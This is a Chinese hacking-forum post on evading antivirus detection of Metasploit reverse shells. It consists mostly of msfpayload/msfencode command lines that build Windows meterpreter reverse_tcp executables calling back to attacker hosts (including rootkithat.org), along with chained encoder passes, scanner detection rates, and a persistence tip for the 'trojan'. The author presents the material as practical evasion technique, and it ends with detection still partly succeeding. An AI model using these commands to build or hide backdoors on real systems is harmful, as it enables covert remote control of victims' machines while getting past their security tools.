切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
13 Metasploit reverse Shell的免杀[复制链接]
发表于 2012-8-5 20:53:19 | 显示全部楼层 |!read_mode!
rootkithat是我以前的马甲 以前写的文章

我们先生成一个X64的WINDOWS XP 的reverse SHELL
  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
  2. meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe
复制代码

提示:你可以用 scheduleme -m 1 -u e /tmp/x64.exe 让你的木马更持久

提交到世界杀毒网

——————————————
8%的杀软(3/37)报告发现病毒,我们来加密他,让他到达免杀的效果
查看metasploit自带的加密模块

  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfencode -l
  2. Framework
  3. Encoders==================  Name Rank Description ---- ----
  4. ----------- cmd/generic_sh good Generic Shell Variable Substitution
  5. Command Encoder cmd/ifs low Generic ${IFS} Substitution Command
  6. Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes
  7. Utility Command Encoder generic/none normal The "none" Encoder mipsbe/
  8. longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/
  9. base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder
  10. ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal
  11. SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low
  12. Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2
  13. Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid
  14. UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/
  15. context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/
  16. context_stat manual stat(2)-based Context Keyed Payload Encoder x86/
  17. context_time manual time(2)-based Context Keyed Payload Encoder x86/
  18. countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov
  19. normal Variable-length Fnstenv/mov Dword XOR Encoder x86/
  20. jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/
  21. nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/
  22. shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/
  23. single_static_bit manual Single Static Bit x86/unicode_mixed manual
  24. Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual
  25. Alpha2 Alphanumeric Unicode Uppercase Encoder  root@rootkithat:/opt/
复制代码
framework-3.7.1/msf3#
下面的过程加密了6次

  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
  2. meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1122 R | ./msfencode -t
  3. exe -o /tmp/x2.exe -e x86/shikata_ga_nai -c 6 [*] x86/shikata_ga_nai
  4. succeeded with size 317 (iteration=1)  [*] x86/shikata_ga_nai
  5. succeeded with size 344 (iteration=2)  [*] x86/shikata_ga_nai
  6. succeeded with size 371 (iteration=3)  [*] x86/shikata_ga_nai
  7. succeeded with size 398 (iteration=4)  [*] x86/shikata_ga_nai
  8. succeeded with size 425 (iteration=5)  [*] x86/shikata_ga_nai
  9. succeeded with size 452 (iteration=6)  root@rootkithat:/opt/
  10. framework-3.7.1/msf3#
复制代码
再次提交到世界杀毒网 结果还是被杀:文件名称 : x2.exe (本站不提供任何文件的下载服务)文件大小 : 73802 byte 文件类型 : PE32 executable
for MS Windows (GUI) Intel 80386 32-bit MD5 :
5fbf2d47978ab2e1e110fc1dc62c1dda SHA1 :
b7b8d7881afd915bf7a5fd1050b4fe0d3456a177 扫描结果 : 32%的杀软(12/37)报告发现病毒
那咱们来加密61次!
  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
  2. meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1122 R | ./msfencode -t
  3. exe -o /tmp/x3.exe -e x86/shikata_ga_nai -c 61 [*] x86/shikata_ga_nai
  4. succeeded with size 317 (iteration=1)  [*] x86/shikata_ga_nai
  5. succeeded with size 344 (iteration=2)  [*] x86/shikata_ga_nai
  6. succeeded with size 371 (iteration=3)  [*] x86/shikata_ga_nai
  7. succeeded with size 398 (iteration=4)  [*] x86/shikata_ga_nai
  8. succeeded with size 425 (iteration=5)  [*] x86/shikata_ga_nai
  9. succeeded with size 452 (iteration=6)  [*] x86/shikata_ga_nai
  10. succeeded with size 479 (iteration=7)  [*] x86/shikata_ga_nai
  11. succeeded with size 506 (iteration=8)  [*] x86/shikata_ga_nai
  12. succeeded with size 533 (iteration=9)  [*] x86/shikata_ga_nai
  13. succeeded with size 560 (iteration=10)  [*] x86/shikata_ga_nai
  14. succeeded with size 587 (iteration=11)  [*] x86/shikata_ga_nai
  15. succeeded with size 614 (iteration=12)  [*] x86/shikata_ga_nai
  16. succeeded with size 641 (iteration=13)  [*] x86/shikata_ga_nai
  17. succeeded with size 668 (iteration=14)  [*] x86/shikata_ga_nai
  18. succeeded with size 695 (iteration=15)  [*] x86/shikata_ga_nai
  19. succeeded with size 722 (iteration=16)  [*] x86/shikata_ga_nai
  20. succeeded with size 749 (iteration=17)  [*] x86/shikata_ga_nai
  21. succeeded with size 776 (iteration=18)  [*] x86/shikata_ga_nai
  22. succeeded with size 803 (iteration=19)  [*] x86/shikata_ga_nai
  23. succeeded with size 830 (iteration=20)  [*] x86/shikata_ga_nai
  24. succeeded with size 857 (iteration=21)  [*] x86/shikata_ga_nai
  25. succeeded with size 884 (iteration=22)  [*] x86/shikata_ga_nai
  26. succeeded with size 911 (iteration=23)  [*] x86/shikata_ga_nai
  27. succeeded with size 938 (iteration=24)  [*] x86/shikata_ga_nai
  28. succeeded with size 965 (iteration=25)  [*] x86/shikata_ga_nai
  29. succeeded with size 992 (iteration=26)  [*] x86/shikata_ga_nai
  30. succeeded with size 1019 (iteration=27)  [*] x86/shikata_ga_nai
  31. succeeded with size 1046 (iteration=28)  [*] x86/shikata_ga_nai
  32. succeeded with size 1075 (iteration=29)  [*] x86/shikata_ga_nai
  33. succeeded with size 1104 (iteration=30)  [*] x86/shikata_ga_nai
  34. succeeded with size 1133 (iteration=31)  [*] x86/shikata_ga_nai
  35. succeeded with size 1162 (iteration=32)  [*] x86/shikata_ga_nai
  36. succeeded with size 1191 (iteration=33)  [*] x86/shikata_ga_nai
  37. succeeded with size 1220 (iteration=34)  [*] x86/shikata_ga_nai
  38. succeeded with size 1249 (iteration=35)  [*] x86/shikata_ga_nai
  39. succeeded with size 1278 (iteration=36)  [*] x86/shikata_ga_nai
  40. succeeded with size 1307 (iteration=37)  [*] x86/shikata_ga_nai
  41. succeeded with size 1336 (iteration=38)  [*] x86/shikata_ga_nai
  42. succeeded with size 1365 (iteration=39)  [*] x86/shikata_ga_nai
  43. succeeded with size 1394 (iteration=40)  [*] x86/shikata_ga_nai
  44. succeeded with size 1423 (iteration=41)  [*] x86/shikata_ga_nai
  45. succeeded with size 1452 (iteration=42)  [*] x86/shikata_ga_nai
  46. succeeded with size 1481 (iteration=43)  [*] x86/shikata_ga_nai
  47. succeeded with size 1510 (iteration=44)  [*] x86/shikata_ga_nai
  48. succeeded with size 1539 (iteration=45)  [*] x86/shikata_ga_nai
  49. succeeded with size 1568 (iteration=46)  [*] x86/shikata_ga_nai
  50. succeeded with size 1597 (iteration=47)  [*] x86/shikata_ga_nai
  51. succeeded with size 1626 (iteration=48)  [*] x86/shikata_ga_nai
  52. succeeded with size 1655 (iteration=49)  [*] x86/shikata_ga_nai
  53. succeeded with size 1684 (iteration=50)  [*] x86/shikata_ga_nai
  54. succeeded with size 1713 (iteration=51)  [*] x86/shikata_ga_nai
  55. succeeded with size 1742 (iteration=52)  [*] x86/shikata_ga_nai
  56. succeeded with size 1771 (iteration=53)  [*] x86/shikata_ga_nai
  57. succeeded with size 1800 (iteration=54)  [*] x86/shikata_ga_nai
  58. succeeded with size 1829 (iteration=55)  [*] x86/shikata_ga_nai
  59. succeeded with size 1858 (iteration=56)  [*] x86/shikata_ga_nai
  60. succeeded with size 1887 (iteration=57)  [*] x86/shikata_ga_nai
  61. succeeded with size 1916 (iteration=58)  [*] x86/shikata_ga_nai
  62. succeeded with size 1945 (iteration=59)  [*] x86/shikata_ga_nai
  63. succeeded with size 1974 (iteration=60)  [*] x86/shikata_ga_nai
  64. succeeded with size 2003 (iteration=61)  root@rootkithat:/opt/
  65. framework-3.7.1/msf3
复制代码

#
返回结果如下文件名称 : x3.exe (本站不提供任何文件的下载服务) 文件大小 : 73802 byte 文件类型 : PE32
executable for MS Windows (GUI) Intel 80386 32-bit MD5 :
cca64d1b86e0e6b453d296a72b343f58 SHA1 :
d0d7645b8c319ff02b7bbdb36efbec8f4292956e 扫描结果 扫描结果 : 32%的杀软(12/37)报告发现病
毒 时间 : 2011/06/19 20:35:15 (CST)
看来不行了,用得人太多了。发大招吧,混合加密
  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
  2. meterpreter/reverse_tcp LHOST=rootkithat.org LPORT=43958 R | ./
  3. msfencode -e x86/fnstenv_mov -t raw -c 10 | ./msfencode -t exe -c 10
  4. > /tmp/x4.exe [*] x86/fnstenv_mov succeeded with size 314

  5. (iteration=1)  [*] x86/fnstenv_mov succeeded with size 338
  6. (iteration=2)  [*] x86/fnstenv_mov succeeded with size 362
  7. (iteration=3)  [*] x86/fnstenv_mov succeeded with size 386
  8. (iteration=4)  [*] x86/fnstenv_mov succeeded with size 410
  9. (iteration=5)  [*] x86/fnstenv_mov succeeded with size 434
  10. (iteration=6)  [*] x86/fnstenv_mov succeeded with size 458
  11. (iteration=7)  [*] x86/fnstenv_mov succeeded with size 482
  12. (iteration=8)  [*] x86/fnstenv_mov succeeded with size 506
  13. (iteration=9)  [*] x86/fnstenv_mov succeeded with size 530
  14. (iteration=10)  [*] x86/shikata_ga_nai succeeded with size 557
  15. (iteration=1)  [*] x86/shikata_ga_nai succeeded with size 584
  16. (iteration=2)  [*] x86/shikata_ga_nai succeeded with size 611
  17. (iteration=3)  [*] x86/shikata_ga_nai succeeded with size 638
  18. (iteration=4)  [*] x86/shikata_ga_nai succeeded with size 665
  19. (iteration=5)  [*] x86/shikata_ga_nai succeeded with size 692
  20. (iteration=6)  [*] x86/shikata_ga_nai succeeded with size 719
  21. (iteration=7)  [*] x86/shikata_ga_nai succeeded with size 746
  22. (iteration=8)  [*] x86/shikata_ga_nai succeeded with size 773
  23. (iteration=9)  [*] x86/shikata_ga_nai succeeded with size 800
  24. (iteration=10)  root@rootkithat:/opt/framework-3.7.1/msf3#
复制代码

返回结果文件名称 : x4.exe (本站不提供任何文件的下载服务) 文件大小 : 73802 byte 文件类型 : PE32
executable for MS Windows (GUI) Intel 80386 32-bit MD5 :
afd93f615507c34111b38595d45d5533 SHA1 :
d88f7a5a3a6bd24907dc3b83c76a461cac2f109e 扫描结果 扫描结果 : 38%的杀软(14/37)报告发现病
毒 时间 : 2011/06/19 20:41:46 (CST)
麻辣个B! 继续加密 4种混合方式
  1. root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/
  2. meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e
  3. x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -
  4. c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/
  5. jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe
  6. [*] x86/call4_dword_xor succeeded with size 316 (iteration=1)  [*] x86/
  7. call4_dword_xor succeeded with size 340 (iteration=2)  [*] x86/
  8. call4_dword_xor succeeded with size 364 (iteration=3)  [*] x86/
  9. call4_dword_xor succeeded with size 388 (iteration=4)  [*] x86/
  10. call4_dword_xor succeeded with size 412 (iteration=5)  [*] x86/
  11. countdown succeeded with size 430 (iteration=1)  [*] x86/countdown
  12. succeeded with size 448 (iteration=2)  [*] x86/countdown succeeded
  13. with size 466 (iteration=3)  [*] x86/countdown succeeded with size 484
  14. (iteration=4)  [*] x86/countdown succeeded with size 502
  15. (iteration=5)  [*] x86/fnstenv_mov succeeded with size 526
  16. (iteration=1)  [*] x86/fnstenv_mov succeeded with size 551
  17. (iteration=2)  [*] x86/fnstenv_mov succeeded with size 575
  18. (iteration=3)  [*] x86/fnstenv_mov succeeded with size 599
  19. (iteration=4)  [*] x86/fnstenv_mov succeeded with size 623
  20. (iteration=5)  [*] x86/jmp_call_additive succeeded with size 653
  21. (iteration=1)  [*] x86/jmp_call_additive succeeded with size 685
  22. (iteration=2)  [*] x86/jmp_call_additive succeeded with size 717
  23. (iteration=3)  [*] x86/jmp_call_additive succeeded with size 749
  24. (iteration=4)  [*] x86/jmp_call_additive succeeded with size 781
  25. (iteration=5)  [*] x86/shikata_ga_nai succeeded with size 808
  26. (iteration=1)  [*] x86/shikata_ga_nai succeeded with size 835
  27. (iteration=2)  [*] x86/shikata_ga_nai succeeded with size 862
  28. (iteration=3)  [*] x86/shikata_ga_nai succeeded with size 889
  29. (iteration=4)  [*] x86/shikata_ga_nai succeeded with size 916
  30. (iteration=5)
复制代码

病毒扫描开始…当前位置: 25/37 (67%)当前引擎: Norman 上个引擎: NOD32 找到 a variant of
Win32/Rozena.AH trojan 可疑程度: 10/37 (27%)
无可奈何,期待官方下一次更新算法



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-31 00:56

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部